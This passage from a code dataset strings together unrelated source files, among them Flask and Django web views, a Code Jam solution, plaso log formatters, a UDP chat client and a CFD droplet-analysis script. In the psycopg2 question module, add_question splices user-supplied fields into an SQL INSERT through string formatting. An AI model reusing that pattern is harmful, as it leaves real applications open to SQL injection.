mongo.db.projects.insert_one(request.form.to_dict())\n loc = api.url_for(Project, projid=res.inserted_id)\n return loc, 201, {'Location': loc}\n\napi.add_resource(ProjectList, '/projects')\n\n\nFIELD_DISPLAY_NAMES = OrderedDict([\n ('name', 'Project'),\n ('address', 'Address'),\n ('start_date', 'Start Date'),\n ('end_date', 'End Date'),\n ('stage', 'Stage'),\n ('completion', 'Completion'),\n ('psh', 'PSH'),\n ('livework', 'Live/Work'),\n ('affordable', 'Aff. 
Housing'),\n    ('commercial', 'Commercial'),\n    ('comments', 'Comments/Updates'),\n])\n\n\ndef value_display(k, v):\n    if not v:\n        return v\n    elif k == 'completion':\n        return float(v) * 100\n    return v\n\n\n@blueprint.route('/csv')\ndef csvdownload():\n    buf = io.StringIO()\n    dw = csv.DictWriter(buf, FIELD_DISPLAY_NAMES.values())\n    dw.writeheader()\n    for doc in mongo.db.projects.find():\n        dw.writerow({\n            FIELD_DISPLAY_NAMES[k]: value_display(k, v)\n            for k, v in doc.items() if k in FIELD_DISPLAY_NAMES\n        })\n\n    r = make_response(buf.getvalue())\n    r.headers['Content-Type'] = 'text/csv'\n    r.headers['Content-Disposition'] = 'attachment; filename=RED.csv'\n\n    return r\n","sub_path":"red/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"597073975","text":"from website.models import Page, Project, Story\nfrom website.views.decorators import api_request\n\n_routes = []\n\n@api_request\ndef get_sitemap(req_handler):\n    global _routes\n    req_handler.response.prepare(routes=[])\n    if(not _routes):\n        _routes = [ x.to_route() for x in Page.objects.all() ]\n        _routes += [ x.to_route() for x in Project.objects.all() ]\n        _routes += [ x.to_route() for x in Story.objects.all() ]\n    req_handler.response.set_data({ \"routes\" : _routes })\n    return req_handler\n\n","sub_path":"website/views/api/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"202539042","text":"for tc in range(int(input())):\r\n    N = int(input())\r\n    \r\n    events = []\r\n    Jfree = -1\r\n    Cfree = -1\r\n    \r\n    output = [''] * N\r\n    for i in range(N):\r\n        l, r = [int(x) for x in input().split()]\r\n        events.append((l, r, i))\r\n    \r\n    for event in sorted(events):\r\n        \r\n        if Jfree <= event[0]:\r\n            Jfree = event[1]\r\n            output[event[2]] = \"J\"\r\n        \r\n        elif Cfree <= event[0]:\r\n            Cfree = event[1]\r\n            output[event[2]] = \"C\"\r\n        \r\n        else:\r\n            output = [\"IMPOSSIBLE\"]\r\n            break\r\n    \r\n    print(\"Case #{}: {}\".format(tc + 1, ''.join(output)))\r\n    ","sub_path":"Qualification/parenting.py","file_name":"parenting.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"353822911","text":"# -*- coding: utf-8 -*-\nfrom bagogold.acoes.models import Acao, ProventoAcao, AcaoProvento, \\\n    OperacaoAcao, UsoProventosOperacaoAcao, OperacaoCompraVenda, HistoricoAcao, \\\n    ValorDiarioAcao, TaxaCustodiaAcao\nfrom django.contrib import admin\n\n\nadmin.site.register(Acao)\n\nclass ProventoAcaoAdmin(admin.ModelAdmin):\n    search_fields = ['acao__ticker']\n    list_display = ('acao', 'tipo_provento', 'valor_unitario', 'data_ex', 'data_pagamento')\n    \n    def get_queryset(self, request):\n        # use our manager, rather than the default one\n        qs = self.model.gerador_objects.get_queryset()\n        \n        # we need this from the superclass method\n        ordering = self.ordering or () # otherwise we might try to *None, which is bad ;)\n        if ordering:\n            qs = qs.order_by(*ordering)\n        return qs\n    \nadmin.site.register(ProventoAcao, ProventoAcaoAdmin)\n\nadmin.site.register(AcaoProvento)\n \nadmin.site.register(OperacaoAcao)\n\nadmin.site.register(UsoProventosOperacaoAcao)\n\nadmin.site.register(OperacaoCompraVenda)\n\nclass HistoricoAcaoAdmin(admin.ModelAdmin):\n    search_fields = ['acao__ticker', 'data']\n    list_display = ('acao', 'preco_unitario', 'data', 'oficial_bovespa')\n    
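# price-history admin: list view searchable by ticker and date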
\nadmin.site.register(HistoricoAcao, HistoricoAcaoAdmin)\n \nadmin.site.register(ValorDiarioAcao)\n \nadmin.site.register(TaxaCustodiaAcao)\n","sub_path":"bagogold/acoes/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"626977060","text":"import turtle\n\nx0, y0 = eval (input (\"Enter the center of circle: \"))\nradius = int(input(\"Radius of circle: \"))\nx, y = eval(input(\"Enter a point x, y\"))\n\nturtle.penup()\nturtle.goto(x0, y0 - radius)\nturtle.pendown()\nturtle.circle(radius)\n\nturtle.penup()\nturtle.color(\"red\")\nturtle.goto(x,y)\nturtle.begin_fill()\nturtle.circle(2)\nturtle.end_fill()\n\nlength = ((x - x0) ** 2 + (y - y0) ** 2) ** (1/2)\n\nif (length < radius):\n\tprint(\"Inside the circle\")\nelif (length == radius):\n\tprint(\"On the border of circle\")\nelse:\n\tprint(\"Outside the circle\") \n\nturtle.hideturtle()\nturtle.done()\n","sub_path":"insideOrOutsideCircle.py","file_name":"insideOrOutsideCircle.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"183979092","text":"from psycopg2.extras import RealDictCursor, DictCursor\nimport database_common\n\n@database_common.connection_handler\ndef get_all_questions(cursor: RealDictCursor) -> dict:\n query = \"\"\"\n SELECT id, submission_time, view_number, vote_number, title\n FROM question\n ORDER BY submission_time DESC\n \"\"\"\n cursor.execute(query)\n questions = cursor.fetchall()\n return questions\n\n\n@database_common.connection_handler\ndef add_question(cursor: RealDictCursor, sub, view_n, vote_n, title, mess, image, email):\n query_max_id = \"\"\"\n SELECT MAX(id) FROM question\n \"\"\"\n cursor.execute(query_max_id)\n new_id = cursor.fetchone()\n nid = new_id['max']\n query = \"INSERT INTO question \" \\\n \"VALUES ({},'{}',{},{},'{}','{}','{}','{}')\".format(nid+1, sub, view_n, vote_n, title, mess, image, email)\n cursor.execute(query)\n return nid+1\n\n\n@database_common.connection_handler\ndef get_question(cursor: RealDictCursor, question_id: int):\n query = \"\"\"\n SELECT *\n From question\n WHERE id=%(question_id)s \n \"\"\"\n param = {'question_id': str(question_id)}\n cursor.execute(query, param)\n return cursor.fetchone()\n\n\n@database_common.connection_handler\ndef get_question_id(cursor: RealDictCursor, question_id):\n query = \"\"\"\n SELECT id\n From question\n WHERE id = %(question_id)s;\n \"\"\"\n param = {'question_id': question_id}\n cursor.execute(query, param)\n result = cursor.fetchone()\n print(result)\n return result['id']\n\n\n@database_common.connection_handler\ndef save_edit_question(cursor: RealDictCursor, question_id, message, title):\n command = \"\"\"\n UPDATE question \n SET message = (%(message)s), title = (%(title)s)\n WHERE id=%(question_id)s \n \"\"\"\n param = {\n 'message': str(message),\n 'title': str(title),\n 'question_id': str(question_id)\n }\n cursor.execute(command, param)\n return None\n\n\n@database_common.connection_handler\ndef vote_up_question(cursor: RealDictCursor, item_id):\n query = \"\"\"\n UPDATE question\n SET vote_number = vote_number + 1\n WHERE id=%(id)s\n \"\"\"\n param = {'id': item_id}\n cursor.execute(query, param)\n return None\n\n\n@database_common.connection_handler\ndef vote_down_question(cursor: RealDictCursor, item_id):\n query = \"\"\"\n UPDATE question\n SET vote_number = vote_number - 1\n WHERE id=%(id)s\n \"\"\"\n param 
= {'id': item_id}\n cursor.execute(query, param)\n return None\n\n\n@database_common.connection_handler\ndef delete_question(cursor: RealDictCursor, question_id):\n command1 = \"\"\"\n DELETE\n FROM comment \n WHERE question_id=%(id)s\n \"\"\"\n command2 = \"\"\"\n DELETE\n FROM comment_q \n WHERE question_id=%(id)s \n \"\"\"\n command3 = \"\"\"\n DELETE\n FROM answer\n WHERE question_id=%(id)s\n \"\"\"\n command4 = \"\"\"\n DELETE\n FROM question \n WHERE id=%(id)s \n \"\"\"\n param = {\"id\": str(question_id)}\n cursor.execute(command1, param)\n cursor.execute(command2, param)\n cursor.execute(command3, param)\n cursor.execute(command4, param)\n return None\n\n\n@database_common.connection_handler\ndef get_five_questions(cursor: RealDictCursor) -> dict:\n query = \"\"\"\n SELECT id, submission_time, view_number, vote_number, title\n FROM question\n ORDER by submission_time DESC\n LIMIT 5\n \"\"\"\n cursor.execute(query)\n questions = cursor.fetchall()\n return questions\n\n@database_common.connection_handler\ndef get_user_from_question(cursor: RealDictCursor, question_id):\n query = \"\"\"\n SELECT user_id\n From question\n WHERE id = %(question_id)s;\n \"\"\"\n param = {'question_id': question_id}\n cursor.execute(query, param)\n result = cursor.fetchone()\n print(result)\n return result['user_id']","sub_path":"questions_data.py","file_name":"questions_data.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"79700380","text":"#!/usr/bin/env python3.7\n# coding=utf-8\nimport os\nimport sys\nimport socket\nimport daemon\nimport logging\nimport getopt\n\nimport config\n\n\ntry:\n opts, args = getopt.getopt(sys.argv[1:], \"ds:\", [\"debug\", \"signal=\"])\nexcept getopt.GetoptError:\n print('uqed-cli -d -s <signal_str>')\n sys.exit(2)\n\nrun_in_debug = False\nsignal_str = ''\nfor opt, arg in opts:\n if opt in ('-d', '--debug'):\n run_in_debug = True\n elif opt in ('-s', '--signal'):\n signal_str = arg\n\n\ndef run_quant_engine(ipc_path, use_stdout=False):\n from qev1 import QuantEngine\n if use_stdout:\n stream = sys.stdout\n else:\n stream = open('qev1.log', mode='w')\n logging.basicConfig(stream=stream,\n format='%(levelname)s # %(processName)s : %(message)s',\n level=config.logginglevel)\n\n import strategy_ma\n\n strategy_obj = strategy_ma.Ma_pos_Strategy()\n strategy_obj.init_strategy_data()\n\n qe = QuantEngine(strategy_obj, mock_execution=config.mock_execution)\n qe.run(ipc_path)\n\n\nipc_path = './qed.ipc'\nif not os.path.exists(ipc_path):\n if run_in_debug:\n print('start quant engine in debug mode')\n run_quant_engine(None, True)\n else:\n print('start quant engine in daemon')\n context = daemon.DaemonContext(working_directory='./')\n with context:\n run_quant_engine(ipc_path)\nelse:\n if signal_str:\n message = signal_str.encode('utf-8')\n print('send signal string:{}'.format(signal_str))\n else:\n print('stop quant engine!')\n message = b'stop'\n\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n try:\n sock.connect(ipc_path)\n except socket.error as msg:\n print(msg)\n sys.exit(1)\n\n # send ipc cmd\n sock.sendall(message)\n sock.close()\n\n os.unlink(ipc_path)\n","sub_path":"uqed-cli.py","file_name":"uqed-cli.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"288875216","text":"# -*- coding: utf-8 -*-\n\"\"\"The Trend Micro AV Logs file event formatter.\"\"\"\n\nfrom 
__future__ import unicode_literals\n\nfrom plaso.formatters import interface\nfrom plaso.formatters import manager\n\n\nclass OfficeScanVirusDetectionLogEventFormatter(\n interface.ConditionalEventFormatter):\n \"\"\"Formatter for a Trend Micro Office Scan Virus Detection Log event.\"\"\"\n\n DATA_TYPE = 'av:trendmicro:scan'\n\n FORMAT_STRING_PIECES = [\n 'Path: {path}',\n 'File name: {filename}',\n '{threat}',\n ': {action}',\n '({scan_type})']\n\n FORMAT_STRING_SHORT_PIECES = [\n '{path}',\n '{filename}',\n '{action}']\n\n SOURCE_LONG = 'Trend Micro Office Scan Virus Detection Log'\n SOURCE_SHORT = 'LOG'\n\n _SCAN_RESULTS = {\n 0: \"Success (clean)\",\n 1: \"Success (move)\",\n 2: \"Success (delete)\",\n 3: \"Success (rename)\",\n 4: \"Pass > Deny access\",\n 5: \"Failure (clean)\",\n 6: \"Failure (move)\",\n 7: \"Failure (delete)\",\n 8: \"Failure (rename)\",\n 10: \"Failure (clean), moved\",\n 11: \"Failure (clean), deleted\",\n 12: \"Failure (clean), renamed\",\n 13: \"Pass > Deny access\",\n 14: \"Failure (clean), move also failed\",\n 15: \"Failure (clean), delete also failed\",\n 16: \"Failure (clean), rename also failed\",\n 25: \"Passed a potential security risk\"\n }\n\n _SCAN_TYPES = {\n 0: \"Manual scan\",\n 1: \"Real-time scan\",\n 2: \"Scheduled scan\",\n 3: \"Scan Now scan\",\n 4: \"DCS scan\"\n }\n\n def __init__(self):\n \"\"\"Initializes a Trend Micro Virus Log event format helper.\"\"\"\n super(OfficeScanVirusDetectionLogEventFormatter, self).__init__()\n helper = interface.EnumerationEventFormatterHelper(\n default='UNKNOWN', input_attribute='action',\n output_attribute='action', values=self._SCAN_RESULTS)\n\n self.helpers.append(helper)\n\n helper = interface.EnumerationEventFormatterHelper(\n default='UNKNOWN', input_attribute='scan_type',\n output_attribute='scan_type', values=self._SCAN_TYPES)\n\n self.helpers.append(helper)\n\n\nclass OfficeScanWebReputationLogEventFormatter(\n interface.ConditionalEventFormatter):\n \"\"\"Formatter for a Trend Micro Office Scan Virus Detection Log event.\"\"\"\n\n DATA_TYPE = 'av:trendmicro:webrep'\n\n FORMAT_STRING_PIECES = [\n '{url}',\n '{ip}',\n 'Group: {group_name}',\n '{group_code}',\n 'Mode: {block_mode}',\n 'Policy ID: {policy_identifier}',\n 'Credibility rating: {credibility_rating}',\n 'Credibility score: {credibility_score}',\n 'Threshold value: {threshold}',\n 'Accessed by: {application_name}']\n\n FORMAT_STRING_SHORT_PIECES = [\n '{url}',\n '{group_name}']\n\n SOURCE_LONG = 'Trend Micro Office Scan Virus Detection Log'\n SOURCE_SHORT = 'LOG'\n\n _BLOCK_MODES = {\n 0: \"Internal filter\",\n 1: \"Whitelist only\"\n }\n\n def __init__(self):\n \"\"\"Initializes a Trend Micro Virus Log event format helper.\"\"\"\n super(OfficeScanWebReputationLogEventFormatter, self).__init__()\n helper = interface.EnumerationEventFormatterHelper(\n default='UNKNOWN', input_attribute='block_mode',\n output_attribute='block_mode', values=self._BLOCK_MODES)\n\n self.helpers.append(helper)\n\n\nmanager.FormattersManager.RegisterFormatters([\n OfficeScanVirusDetectionLogEventFormatter,\n OfficeScanWebReputationLogEventFormatter])\n","sub_path":"plaso/formatters/trendmicroav.py","file_name":"trendmicroav.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"624576031","text":"import cc3d\nimport numpy as np\nimport cupy as cp\nimport pandas as pd\nfrom scipy.interpolate import griddata\nimport datetime\nimport math\n\nlabels_in = []\nVmatrix = 
[]\nalphaMatrix = []\nXmatrix = []\nYmatrix = []\nZmatrix = []\nprint(datetime.datetime.now())\n\nboxTextReadFromPandas = pd.read_csv('6barFine.csv')\nxi = boxTextReadFromPandas['Points:1'].min()\nxx = boxTextReadFromPandas['Points:1'].max()\nyi = boxTextReadFromPandas['Points:2'].min()\nyx = boxTextReadFromPandas['Points:2'].max()\n\nprint(xi, xx, yi, yx)\n\nThreshold_value = 0.005\ngridvalue = 1e-4\n\nwith open('cc3d.csv', 'w') as newfile:\n newfile.write(\"delimeter,Volumn,meanx,meany,meanz\\n\")\n \n GroupBy = boxTextReadFromPandas.groupby(\"Points:0\")\n GroupNum = len(GroupBy)\n for num, partdividedbyPointZ in enumerate(GroupBy):\n # print(num,partdividedbyPointZ[0])\n partdividedbyPointZ = partdividedbyPointZ[1].to_numpy()\n\n points = partdividedbyPointZ[:, [4,5]]\n alpha_liquid = partdividedbyPointZ[:, 1]\n V = partdividedbyPointZ[:, 0]\n X = partdividedbyPointZ[:, 4]\n Y = partdividedbyPointZ[:, 5]\n Z = partdividedbyPointZ[:, 3]\n grid_x, grid_y = np.mgrid[xi:xx:gridvalue, yi:yx:gridvalue]\n grid_alpha = griddata(points, alpha_liquid, (grid_x, grid_y), method='nearest')\n # grid_z starts as a copy of the interpolated alpha field and is then thresholded into a binary mask\n grid_z = grid_alpha.copy()\n grid_V = griddata(points, V, (grid_x, grid_y), method='nearest')\n grid_corx = griddata(points, X, (grid_x, grid_y), method='nearest')\n grid_cory = griddata(points, Y, (grid_x, grid_y), method='nearest')\n grid_corz = griddata(points, Z, (grid_x, grid_y), method='nearest')\n grid_z[grid_z < Threshold_value] = 0\n grid_z[grid_z >= Threshold_value] = 1\n grid_z = grid_z.astype(np.int32)\n\n if num % 1000 == 0:\n print(datetime.datetime.now(), (num + 1) / GroupNum)\n grid_z = cp.asarray(grid_z)\n if cp.sum(grid_z) == 0:\n\n labels_in = np.asarray(labels_in)\n\n if np.sum(labels_in) == 0:\n labels_in = []\n Vmatrix = []\n alphaMatrix = []\n Xmatrix = []\n Ymatrix = []\n Zmatrix = []\n continue\n\n # Vmatrix = np.power(np.asarray(Vmatrix),1/3)\n labels_out = cc3d.connected_components(labels_in)\n N = np.max(labels_out)\n for segid in range(1, N + 1):\n # calculate delimeter\n Vmatrix = cp.asarray(Vmatrix)\n alphaMatrix = cp.asarray(alphaMatrix)\n tmpMatrix = cp.asarray(labels_out == segid)\n sumtmpMatrix = cp.multiply(Vmatrix, cp.multiply(alphaMatrix, tmpMatrix))\n sumVolumn = cp.sum(sumtmpMatrix) # sum of Volumn\n sumVolumnDelimeter = math.pow(sumVolumn * 6 / np.pi, 1 / 3)\n\n # coordinate\n Xmatrix = cp.asarray(Xmatrix)\n Ymatrix = cp.asarray(Ymatrix)\n Zmatrix = cp.asarray(Zmatrix)\n meanx = cp.sum(cp.multiply(Xmatrix, sumtmpMatrix)) / sumVolumn\n meany = cp.sum(cp.multiply(Ymatrix, sumtmpMatrix)) / sumVolumn\n meanz = cp.sum(cp.multiply(Zmatrix, sumtmpMatrix)) / sumVolumn\n # write into file\n newfile.write(str(sumVolumnDelimeter)\n + ',' + str(sumVolumn)\n + ',' + str(meanx)\n + ',' + str(meany)\n + ',' + str(meanz)\n + '\\n')\n\n labels_out = []\n labels_in = []\n alphaMatrix = []\n Vmatrix = []\n Xmatrix = []\n Ymatrix = []\n Zmatrix = []\n else:\n labels_in.append(grid_z.tolist())\n alphaMatrix.append(grid_alpha.tolist())\n Vmatrix.append(grid_V.tolist())\n Xmatrix.append(grid_corx.tolist())\n Ymatrix.append(grid_cory.tolist())\n Zmatrix.append(grid_corz.tolist())\n\nprint(datetime.datetime.now())\n","sub_path":"ccl_test4cc3d_cupy_6bar.py","file_name":"ccl_test4cc3d_cupy_6bar.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"122124111","text":"# -*- coding: utf-8 -*-\nfrom PySide import QtGui, QtCore\n\n\nclass WorkAreaUI(QtGui.QDialog):\n 
def __init__(self, parent=None):\n super(WorkAreaUI, self).__init__(parent)\n self.setWindowTitle(\"Work Area\")\n self.setWindowFlags(QtCore.Qt.Dialog | QtCore.Qt.WindowCloseButtonHint | QtCore.Qt.WindowMinimizeButtonHint)\n main_layout = QtGui.QHBoxLayout(self)\n main_layout.setContentsMargins(0, 0, 0, 0)\n main_splitter = QtGui.QSplitter(QtCore.Qt.Horizontal)\n main_layout.addWidget(main_splitter)\n # left layout\n left_widget = QtGui.QFrame()\n left_layout = QtGui.QVBoxLayout(left_widget)\n # _project layout\n project_layout = QtGui.QHBoxLayout()\n project_label = QtGui.QLabel(\"Project\")\n project_label.setFixedWidth(35)\n self.project_cbox = QtGui.QComboBox()\n project_layout.addWidget(project_label)\n project_layout.addWidget(self.project_cbox)\n # _tree layout\n tree_grp = QtGui.QGroupBox(\"Tasks\")\n tree_layout = QtGui.QVBoxLayout(tree_grp)\n self.tree_view = QtGui.QTreeView()\n tree_layout.addWidget(self.tree_view)\n self.tree_view.setHeaderHidden(True)\n self.model = QtGui.QStandardItemModel()\n update_layout = QtGui.QHBoxLayout()\n self.update_btn = QtGui.QPushButton(\"Refresh\")\n update_layout.addStretch()\n update_layout.addWidget(self.update_btn)\n tree_layout.addLayout(update_layout)\n left_layout.addLayout(project_layout)\n left_layout.addWidget(tree_grp)\n # right layout\n right_widget = QtGui.QFrame()\n right_layout = QtGui.QVBoxLayout(right_widget)\n # _work area\n work_area_group = QtGui.QGroupBox(\"Work File\")\n work_area_layout = QtGui.QVBoxLayout(work_area_group)\n # _path line edit\n path_layout = QtGui.QHBoxLayout()\n path_label = QtGui.QLabel(\"Path\")\n path_label.setFixedWidth(25)\n self.path_le = QtGui.QLineEdit()\n path_layout.addWidget(path_label)\n path_layout.addWidget(self.path_le)\n self.work_file_list_widget = QtGui.QListWidget()\n work_area_layout.addLayout(path_layout)\n work_area_layout.addWidget(self.work_file_list_widget)\n # local work area\n local_work_area_group = QtGui.QGroupBox(\"Local Work File\")\n local_work_area_layout = QtGui.QVBoxLayout(local_work_area_group)\n # _path line edit\n local_path_layout = QtGui.QHBoxLayout()\n local_path_label = QtGui.QLabel(\"Path\")\n local_path_label.setFixedWidth(25)\n self.local_path_le = QtGui.QLineEdit()\n self.open_local_btn = QtGui.QPushButton(\"Open\")\n self.open_local_btn.setFixedWidth(35)\n local_path_layout.addWidget(local_path_label)\n local_path_layout.addWidget(self.local_path_le)\n local_path_layout.addWidget(self.open_local_btn)\n self.local_work_file_list_widget = QtGui.QListWidget()\n # _local work btn layout\n local_work_btn_layout = QtGui.QHBoxLayout()\n self.refresh_btn = QtGui.QPushButton(\"Refresh\")\n self.start_btn = QtGui.QPushButton(\"Start\")\n self.open_btn = QtGui.QPushButton(\"Open\")\n local_work_btn_layout.addStretch()\n local_work_btn_layout.addWidget(self.refresh_btn)\n local_work_btn_layout.addWidget(self.start_btn)\n local_work_btn_layout.addWidget(self.open_btn)\n local_work_area_layout.addLayout(local_path_layout)\n local_work_area_layout.addWidget(self.local_work_file_list_widget)\n local_work_area_layout.addLayout(local_work_btn_layout)\n\n right_layout.addWidget(work_area_group)\n right_layout.addWidget(local_work_area_group)\n\n main_splitter.insertWidget(0, left_widget)\n main_splitter.insertWidget(1, right_widget)\n main_splitter.setSizes([250, 350])\n\n\ndef main():\n 
pass\n","sub_path":"miraScripts/pipeTools/workarea/workarea_ui.py","file_name":"workarea_ui.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"224831636","text":"import socket\nimport threading\n\nprint('\\nWelcome to kechat!')\nprint('\\n-----------------------------------------------------')\nprint(r'Enter \"\\users\" to view a list of online users')\nprint(r'Enter \"\\e[username] [text]\" to send private message')\nprint('-----------------------------------------------------\\n')\n\ndef read_soket():\n while True:\n data = sock.recv(1024)\n print(data.decode())\nserver = '', 8000\nalias = input('Enter you name: ')\nsock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\nsock.bind(('', 0))\nsock.sendto((alias + ' <= join to chat!').encode(), server)\nthread_1 = threading.Thread(target = read_soket)\nthread_1.start()\nwhile True:\n message = input()\n if r'\\users' in message:\n sock.sendto((message).encode(), server)\n elif r'\\e' in message:\n sock.sendto(('Message from ' + str(alias) + ': ' \n + message).encode(), server)\n else:\n sock.sendto((alias + ': '+message).encode(), server)","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"131202208","text":"from django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import login, authenticate, logout\nfrom .models import FoodType, Size, Topping, BasePrice, ToppingPrice, Order, ShoppingCart\nfrom django.core import serializers\nfrom django.views.decorators.http import require_http_methods\nfrom django.contrib import messages\n\n# USER VIEWS\ndef index(request):\n if request.user.is_authenticated:\n if request.method == \"GET\":\n # get dishes from menu model and render them\n context = {\n \"food_type\": FoodType.objects.all()\n }\n return render(request, \"index.html\", context)\n\n if request.method == \"POST\":\n # get user, food_type, and food category\n username = request.user\n food_type_id = request.POST[\"food_type\"]\n food_type_id = food_type_id.split(':')[0]\n food_category = FoodType.objects.get(id=food_type_id).category\n base = FoodType.objects.get(id=food_type_id).base\n print(f\"From client got: {username}, {food_type_id}, {food_category}, base: {base}\")\n\n # get base price\n if any(x in food_category for x in [\"Pizza\", \"Sub\", \"Dinner Platters\"]):\n size = request.POST[\"size\"]\n else:\n size = \"Regular\"\n\n print(f\"size: {size}\")\n\n size_id = Size.objects.get(size=size.split(',')[0]).id\n base_price = BasePrice.objects.get(food_id=food_type_id,size=size_id).price\n\n # get toppings price if necessary\n if \"toppings\" in request.POST:\n toppings = request.POST.getlist(\"toppings\")\n print(f\"toppings: {toppings}\")\n if \"Pizza\" in food_category and not \"Special\" in base:\n topping_price = ToppingPrice.objects.get(food=food_type_id,size_id=size_id,topping_num=len(toppings)).price\n elif \"Sub\" in food_category:\n topping_price = ToppingPrice.objects.get(food=food_type_id,topping_num=len(toppings)).price\n else:\n topping_price = 0\n else:\n topping_price = 0\n\n order_price=base_price+topping_price\n print(f\"order price is: ${order_price}\")\n\n # create order in model\n order = Order(username=username, 
food_type_id=food_type_id, size_id=size_id, order_price=order_price)\n order.save()\n\n if any(x in food_category for x in [\"Pizza\", \"Sub\"]):\n toppings = Topping.objects.filter(topping__in=toppings)\n # print(toppings)\n order.toppings.set(toppings)\n\n # create shopping cart or add order to shopping cart\n if not ShoppingCart.objects.filter(username=username, status=\"unconfirmed\"):\n\n # create shopping cart if none created\n shopping_cart = ShoppingCart(username=username, total_price=order_price, status=\"unconfirmed\")\n shopping_cart.save()\n shopping_cart.orders.add(order)\n\n else:\n # add order to shopping cart\n shopping_cart = ShoppingCart.objects.get(username=username, status=\"unconfirmed\")\n shopping_cart.orders.add(order)\n old_total_price = shopping_cart.total_price\n shopping_cart.total_price = old_total_price + order_price\n shopping_cart.save()\n\n messages.success(request, \"Your order has been successfully added to the shopping cart\")\n\n return HttpResponseRedirect(reverse(\"index\"))\n\n else:\n return HttpResponseRedirect(reverse(\"login\"), {\"message\": \"please login before making an order\"})\n\n\ndef shopping_cart(request):\n\n if request.user.is_authenticated:\n\n # get orders\n username = request.user\n orders = Order.objects.filter(username=username, shoppingcart__status=\"unconfirmed\")\n\n try:\n shopping_cart = ShoppingCart.objects.get(username=username, status=\"unconfirmed\")\n print(shopping_cart)\n except ShoppingCart.DoesNotExist:\n shopping_cart = None\n\n if request.method == \"GET\":\n\n # pass orders and total_price to context\n if shopping_cart:\n\n print(shopping_cart)\n context = {\n \"orders\": orders,\n \"total_price\": shopping_cart.total_price,\n \"shopping_cart\": shopping_cart\n }\n\n return render(request, \"shopping_cart.html\", context)\n\n else:\n print(\"No shopping cart\")\n return render(request, \"shopping_cart.html\", {\"message\": \"You have no items in the shopping cart yet\"})\n\n if request.method == \"POST\":\n\n # check if user succesfully pressed confirm order button\n if request.POST[\"order_confirmed\"]==\"confirmed\":\n\n shopping_cart.status = \"pending\"\n shopping_cart.save()\n\n return render(request, \"shopping_cart.html\", {\"message\": \"Your order has been sent to Pinnochio's Pizzas & Subs\"})\n else:\n return HttpResponseRedirect(reverse(\"shopping_cart\"), {\"message\": \"there was an error submitting your order, please contact Pinnochio's or try again\"})\n else:\n return HttpResponseRedirect(reverse(\"login\"), {\"message\": \"please login before making an order\"})\n\n\ndef your_orders(request):\n if request.user.is_authenticated:\n\n username=request.user\n shopping_carts = ShoppingCart.objects.filter(username=username).exclude(status=\"unconfirmed\")\n\n if request.method == \"GET\":\n\n # pass shopping_cart to context\n context = {\n \"shopping_carts\": shopping_carts\n }\n\n return render(request, \"your_orders.html\", context)\n else:\n return HttpResponseRedirect(reverse(\"login\"), {\"message\": \"please login before making an order\"})\n\n\n# send menu options to client\n@require_http_methods([\"POST\"])\ndef load_sizes(request):\n\n # get selected choice and obtain food id\n choice = request.POST['food_choice']\n print(f\"received food choice from client: {choice}\")\n food_id = choice.split(':')[0]\n\n # construct json object with size and price via food id\n sizes_query = BasePrice.objects.filter(food=food_id)\n print(f\"converted size and price to query: {sizes_query}\")\n sizes_json = 
serializers.serialize(\"json\", sizes_query, use_natural_foreign_keys=True, use_natural_primary_keys=True, fields=[\"size\",\"price\"])\n print(f\"converted size and price to json: {sizes_json}\")\n\n # insert size and prices in json object for HttpResponse\n data = {\n \"sizes\": sizes_json\n }\n return JsonResponse(data)\n\n\n# send menu options to client\n@require_http_methods([\"POST\"])\ndef load_toppings(request):\n\n # get selected food choice and obtain food id\n food_choice = request.POST['food_choice']\n size_choice = request.POST['size_choice']\n print(f\"received food choice: {food_choice}\")\n print(f\"received size choice: {size_choice}\")\n\n if size_choice:\n size_id = Size.objects.get(size=size_choice).id\n\n food_choice_id = food_choice.split(':')[0]\n\n # construct json object with toppings\n toppings_query = FoodType.objects.filter(id=food_choice_id)\n print(f\"about to send toppings query: {toppings_query}\")\n\n toppings_json = serializers.serialize(\"json\", toppings_query, use_natural_foreign_keys=True, use_natural_primary_keys=True, fields=[\"toppings\",\"price\"])\n print(f\"about to send toppings json: {toppings_json}\")\n\n # construct json object with toppings' prices\n if size_choice:\n if \"Pizza\" in food_choice:\n toppings_prices_query = ToppingPrice.objects.filter(food=food_choice_id,size_id=size_id)\n else:\n toppings_prices_query = ToppingPrice.objects.filter(food=food_choice_id)\n print(f\"about to send toppings prices query 1: {toppings_prices_query}\")\n else:\n toppings_prices_query = ToppingPrice.objects.filter(food=food_choice_id)\n print(f\"about to send toppings prices query 2: {toppings_prices_query}\")\n\n toppings_prices_json = serializers.serialize(\"json\", toppings_prices_query, use_natural_foreign_keys=True, use_natural_primary_keys=True, fields=[\"topping_num\",\"price\"])\n print(f\"about to send toppings prices 